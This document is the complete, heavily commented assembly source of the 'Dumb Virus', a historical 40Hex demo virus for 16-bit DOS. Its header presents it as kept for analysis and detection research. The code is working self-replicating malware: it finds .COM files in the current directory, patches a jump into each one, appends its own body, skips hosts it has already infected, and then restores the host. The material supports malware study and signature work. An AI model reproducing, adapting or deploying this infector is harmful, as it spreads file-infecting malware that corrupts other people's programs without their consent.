;-----------------------------------------------------------------------
; Dumb Virus - 40Hex demo virus (historical 16-bit DOS .COM appender)
; Syntax: MASM/TASM Intel syntax, tiny model (CS=DS=ES=SS for a .COM).
; Assemble with TASM /m2. Kept here for analysis and detection research.
;
; What the code below does, in order:
;   1. finds its own load offset with the CALL/POP delta trick (bp);
;   2. copies the host's saved first three bytes back to CS:100h;
;   3. enumerates '*.com' in the current directory (INT 21h AH=4Eh/4Fh);
;   4. opens each match read/write (AX=3D02h), reads its first three
;      bytes, and treats "file size == JMP target + body length + 3" as
;      the already-infected marker;
;   5. otherwise writes a 3-byte JMP (E9 xx xx) at offset 0 and appends
;      the body (eov - duh bytes) at end of file;
;   6. restores the default DTA and RETNs to 100h, the restored host.
;
; Register roles: bp = relocation delta, bx = open file handle,
; si/di = copy pointers for the header restore, dx = INT 21h pointers.
;
; Analyst notes (static): an infected .COM begins with E9 and its tail
; carries '*.com',0, three saved host bytes and a lone E9 byte, in that
; order (the masker/stuff/e9 layout at the bottom of this file).
; Analyst notes (behavioural): FindFirst/FindNext loop, each hit opened
; read/write, a 3-byte write at offset 0, then a fixed-size write at EOF.
;-----------------------------------------------------------------------

DumbVirus segment
        Assume  CS:DumbVirus
        Org     100h                    ; account for PSP

; Dumb Virus - 40Hex demo virus
; Assemble with TASM /m2

Start:  db      0e9h                    ; jmp duh
        dw      0                       ; displacement 0 lands on 'duh' in the
                                        ; first generation; in an infected host
                                        ; this word is the patched (size - 3)

; This is where the virus starts
duh:    call    next
next:   pop     bp                      ; bp holds current location
        sub     bp, offset next         ; calculate net change: runtime offset
                                        ; minus assembled offset; added to every
                                        ; data reference below

; Restore the original first three bytes
        lea     si, [bp+offset stuff]
        mov     di, 100h
; Put 100h on the stack for the retn later
; This will allow for the return to the beginning of the file
        push    di
        movsw                           ; 3 bytes = word + byte; relies on DF
        movsb                           ; being clear (no CLD is issued)

; Change DTA from default (otherwise Findfirst/next will destroy
; commandline parameters)
        lea     dx, [bp+offset dta]
        call    set_dta

        mov     ah, 4eh                 ; Find first
        lea     dx, [bp+masker]         ; search for '*.COM',0
        xor     cx, cx                  ; attribute mask - this is unnecessary
tryanother:                             ; shared INT 21h for FindFirst (AH=4Eh)
        int     21h                     ; and FindNext (AH=4Fh, set at 'close')
        jc      quit                    ; Quit on error (CF = no more matches)

; Open file for read/write
; Note: This fails on read-only files
        mov     ax, 3D02h
        lea     dx, [bp+offset dta+30]  ; File name is located in DTA
                                        ; (ASCIIZ name field of the find record)
        int     21h
        xchg    ax, bx                  ; bx = handle for the calls below

; Read in the first three bytes
        mov     ah, 3fh
        lea     dx, [bp+stuff]          ; 'stuff' is part of the appended body,
        mov     cx, 3                   ; so the copy carries the host's header
        int     21h

; Check for previous infection
        mov     ax, word ptr [bp+dta+26]        ; ax = filesize (low word of the
                                                ; find record's size field)
        mov     cx, word ptr [bp+stuff+1]       ; jmp location
        add     cx, eov - duh + 3               ; convert to filesize: an infected
                                                ; host's displacement is old size - 3,
                                                ; plus body length plus the 3-byte jmp
        cmp     ax, cx                          ; if same, already infected
        jz      close                           ; so quit out of here

; Calculate the offset of the jmp
        sub     ax, 3                   ; ax = filesize - 3
        mov     word ptr [bp+writebuffer], ax   ; writebuffer directly follows the
                                                ; e9 byte, so e9..writebuffer is the
                                                ; E9 xx xx written below

; Go to the beginning of the file
        xor     al, al                  ; al = 0: seek from start
        call    f_ptr

; Write the three bytes
        mov     ah, 40h
        mov     cx, 3
        lea     dx, [bp+e9]
        int     21h

; Go to the end of the file
        mov     al, 2                   ; al = 2: seek from end
        call    f_ptr

; And write the rest of the virus
        mov     ah, 40h
        mov     cx, eov - duh           ; body length: duh .. eov (data included)
        lea     dx, [bp+duh]
        int     21h

close:
        mov     ah, 3eh                 ; close handle in bx
        int     21h

; Try infecting another file
        mov     ah, 4fh                 ; Find next
        jmp     short tryanother

; Restore the DTA and return control to the original program
quit:   mov     dx, 80h                 ; Restore current DTA to
                                        ; the default @ PSP:80h
; 'quit' falls through into set_dta; its retn then pops the 100h pushed
; earlier and jumps to the restored host entry point. When reached via
; 'call set_dta' it returns to the caller as usual.
set_dta:
        mov     ah, 1ah                 ; Set disk transfer address
        int     21h
        retn

; f_ptr: INT 21h/42h (move file pointer) to offset 0 from origin al.
; In:    al = origin (0 = start, 2 = end), bx = handle
; Clobb: ax, cx, dx, flags
f_ptr:  mov     ah, 42h
        xor     cx, cx
        cwd                             ; equivalent to: xor dx, dx
                                        ; (ah = 42h keeps ax non-negative)
        int     21h
        retn

masker  db      '*.com',0
; Original three bytes of the infected file
; Currently holds a INT 20h instruction and a null byte
; (in the first generation the retn to 100h therefore lands on INT 20h
; and the program simply terminates after the infection pass)
stuff   db      0cdh, 20h, 0
e9      db      0e9h
eov     equ     $                       ; End of the virus
; The following variables are stored in the heap space (the area between
; the stack and the code) and are not part of the virus that is written
; to files.
writebuffer dw  ?                       ; Scratch area holding the
                                        ; JMP offset
dta     db      42 dup (?)
DumbVirus ENDS
        END     Start